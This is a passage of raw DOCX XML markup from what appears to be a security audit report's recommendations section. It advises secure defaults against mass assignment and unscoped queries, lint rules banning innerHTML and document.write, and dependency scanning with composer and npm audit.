fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,581025,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Secure defaults over remembered discipline.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4585D9FB" w14:textId="77777777" w:rsidR="005E1802" w:rsidRDefault="008125F0" w:rsidP="00674944">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V-04 recurred in five controllers because </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$request-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>all(</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is easier to type than </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$request-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">validated() </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> V-03 recurred in thirteen places because a plain </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>find($id)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the obvious thing to write. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F1391" w14:textId="475FE94C" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00674944">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The fix in both cases was to make the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wrong</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> thing impossible rather than merely discouraged: business keys removed from </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$fillable</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> so mass assignment cannot reach them; </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>visibleTo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the idiom with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unscoped</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries visible by their absence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D8D6C6" w14:textId="01D312F1" w:rsidR="00674944" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>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Lint rules where the framework's protection ends.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743132E4" w14:textId="77777777" w:rsidR="00674944" w:rsidRDefault="00674944" w:rsidP="00674944">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="222" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447EE53F" w14:textId="49DA8286" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="005E1802">
      <w:pPr>
        <w:spacing w:after="0"/>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V-13 happened because the team's mental </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>model  "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>React escapes for us</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"  was</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> correct for 23 of 24 pages and wrong for the one building HTML by hand. A rule banning</w:t>
      </w:r>
      <w:r w:rsidR="005E1802">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> would have flagged it the day it was written. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>And</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the rule must be tested: our first attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532D7C8D" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="005E1802">
      <w:pPr>
        <w:ind w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">used the obvious </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no-restricted-properties</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> form, which silently matched none of the seven real call sites because they are all </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printWindow.document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE5FA4" w14:textId="091FE578" w:rsidR="00674944" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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Dependency scanning in CI from day one.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F62E4" w14:textId="77777777" w:rsidR="005E1802" w:rsidRDefault="008125F0" w:rsidP="00674944">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V-12's 41 advisories did not appear overnight; they accumulated while nobody was looking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130FFED3" w14:textId="34A1850B" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="00674944" w:rsidP="00674944">
      <w:pPr>
        <w:ind w:left="222" w:right="16" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Composer</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> audit</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> audit</w:t>
      </w:r>
      <w:r w:rsidR="008125F0" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> take seconds and would have surfaced Laravel 10's end of life the week it happened, when upgrading was a small job rather than a forced one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B264AB" w14:textId="77777777" w:rsidR="00FA3666" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="45" w:line="259" w:lineRule="auto"/>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Make the insecure default impossible to commit.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF90B5" w14:textId="3340A2CD" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00FA3666">
      <w:pPr>
        <w:spacing w:after="45" w:line="259" w:lineRule="auto"/>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V-14's root cause was not a careless commit it was that</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F6876" w14:textId="3540D347" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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45632" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5EF834E0" wp14:editId="73114C37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-10730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="638175" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26404" name="Group 26404"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="638175" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="638175" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2951" name="Shape 2951"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="930"/>
                                  <a:pt x="635385" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4651"/>
                                  <a:pt x="638175" y="6896"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126442"/>
                                  <a:pt x="637245" y="128699"/>
                                  <a:pt x="635385" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132395"/>
                                  <a:pt x="631280" y="133325"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133325"/>
                                  <a:pt x="4650" y="132395"/>
                                  <a:pt x="2790" y="130535"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2791"/>
                                </a:ln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404" style="width:50.25pt;height:10.5pt;position:absolute;z-index:-2147483551;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-0.844971pt;" coordsize="6381,1333">
                <v:shape id="Shape 2951" style="position:absolute;width:6381;height:1333;left:0;top:0;" coordsize="638175,133350" path="m9525,0l628650,0c631280,0,633525,930,635385,2791c637245,4651,638175,6896,638175,9525l638175,123825c638175,126442,637245,128699,635385,130535c633525,132395,631280,133325,628650,133350l9525,133350c6895,133325,4650,132395,2790,130535l0,123825l0,9525l2790,2791c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251846656" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79A5C7D2" wp14:editId="67EFCE94">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1084957</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-10730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="285750" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26406" name="Group 26406"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="285750" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="285750" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2954" name="Shape 2954"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="285750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="285750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="276225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="278855" y="0"/>
                                  <a:pt x="281100" y="930"/>
                                  <a:pt x="282960" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="284820" y="4651"/>
                                  <a:pt x="285750" y="6896"/>
                                  <a:pt x="285750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="285750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="285750" y="126442"/>
                                  <a:pt x="284820" y="128699"/>
                                  <a:pt x="282960" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="281100" y="132395"/>
                                  <a:pt x="278855" y="133325"/>
                                  <a:pt x="276225" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133325"/>
                                  <a:pt x="4650" y="132395"/>
                                  <a:pt x="2790" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126442"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="930" y="4651"/>
                                  <a:pt x="2790" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="930"/>
                                  <a:pt x="6895" y="0"/>
                                  <a:pt x="9525" y="0"/>
                                </a:cubicBezTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="0" cap="flat">
                            <a:miter lim="127000"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="0">
                            <a:srgbClr val="000000">
                              <a:alpha val="0"/>
                            </a:srgbClr>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:srgbClr val="EDF2F6"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:scrgbClr r="0" g="0" b="0"/>
                          </a:effectRef>
                          <a:fontRef idx="none"/>
                        </wps:style>
                        <wps:bodyPr/>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
            <w:pict>
